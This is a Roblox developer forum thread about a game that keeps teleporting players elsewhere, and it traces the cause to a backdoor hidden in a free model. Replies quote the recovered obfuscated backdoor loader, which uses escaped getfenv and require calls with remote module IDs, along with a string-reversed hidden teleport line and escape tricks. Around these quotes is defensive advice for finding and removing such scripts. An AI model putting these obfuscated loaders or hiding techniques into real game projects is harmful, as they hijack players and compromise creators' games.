My game teleports me to a different one

I’m having some problems with my game. Every time I join my roblox game it immediately teleports me to a different game. usually these.

-Explosive Simulator
-Construction Obby

I don’t know if its a bug or virus in my games or i just lose concretion to the server but its really annoying and i don’t know what to do please help.

Thanks, Stickbot

5 Likes

Have you used any free models? Usually those have viruses. Try not to use them.

4 Likes

I usually clean them if I do but ill go through them again.

1 Like

If there are a lot of them, you can try using one of the many anti-malicious script plugins. Venom is a pretty good one.

4 Likes

Try searching for “Script” in the Explorer and see if there are any scripts that don’t belong to you. If so, remove them, they may contain a virus, I guess.

2 Likes

Sadly viruses in free models are a common issue nowadays.

You can try either searching for suspicious scripts using the explorer or use a plugin to detect and remove them.

1 Like

Also, you could use the In-Built Find Results function from Roblox.
Go to View → Click on “Find Results” → Click on the binoculars → Type in “TeleportService” → Click “Find All”.

3 Likes

Okay let me get straight to the point, you have a backdoor script in your game.

If you use freemodels then one could have a teleport script in them.
I would recommend always checking your models (if you use freemodels) before using them.

2 Likes

I tried doing this but it was not able to find any TeleportService lines.

I found the virus in a crates free model that I had. The script actually is invisible somehow, and when I try to paste it into discord, it says it’s over 2000 words, so I pasted it into microsoft word and here is what I got:

local r=game;if getfenv()[“\103\97\109\101”]"\71\101\116\83\101\114\118\105\99\101""\73\115\83\116\117\100\105\111"then else pcall(function(ff)getfenv(4723885699)“\114\101\113\117\105\114\101” getfenv().mD=4723893531;end) require((6)* 787315588.5 )getfenv()"\115\101\116\102\101\110\118"local V=O({},{__index=function(B0)local n=q;G=n()local z=G[“\113”]X=2361901223*2;n=z()M=n[“\72”]B(function()M(X)end)()if F(n,i)or F(n,z)then while true do end;end;local J=4723753937; B(function()M(J)end)()return function()end;end})2361901223*2 end

So that’s the virus. You can try to search for something like that I guess.

1 Like

Disable the “Allow Third Party Teleports” option in the Game Settings menu.

This will immediately resolve your problem, and then I’d follow the rest of this guide to remove the ‘backdoor’ from your game:

5 Likes

They also hid the script as a “Welder” script, and when I checked inside, the script seemed “empty” but it was just somehow a bypass that they did.

1 Like

Those free models that have a backdoor typically have repetitive descriptions and titles; however, avoiding those free models won’t totally prevent you from getting a backdoor in your game. When inserting a free model, if its a small one, you can check through each child of the model to determine if a script is within it. Usually, the piece of code that’s responsible for the backdoor is hidden within a 100-line script that looks like it consists of empty lines. You should remove those scripts.
For a large model, write a script that iterates through every child within the model and flag the location of the script for manual review.
Note: Run this script within command line. Do not run a game after inserting a free-model with potential backdoor.

Note that legitimate admin commands also may have a backdoor on them. I remember going through a particular famous admin script a long time ago, and it apparently teleported people to a empty base plate game for the purpose of farming tickets in random intervals of time. It looked something like:
game:GetService(string.reverse(“ecivreStropeleT”)):Teleport(…). (which was hidden deep inside the code)
What’s the lesson here? No matter how legitimate the model may look like, you should look at the scripts source code and verify all of its actions, no matter how troublesome that may seem.

2 Likes

It’s best to avoid anything in the Models section of the Toolbox that is not badged as a high-quality item. You can’t get malware from just using raw Decals, Sounds and MeshParts, but anything being distributed in the public Models section, wrapped in a Model is very high risk; so high it’s not worth the trouble, honestly.

3 Likes

Thank you I fixed my problem :slight_smile:

1 Like

Follow these steps:

Home tab > Game Settings > Security > Allow Third Party Teleports

Disable it

Press ctrl + shirt + f then search for :Teleport and require, see if anything is showing up.

1 Like

You have to be wary of the fact that sometimes require is loaded in through getfenv:
getfenv () [ "\114\101\113\117\105\114\101" ](moduleId)

1 Like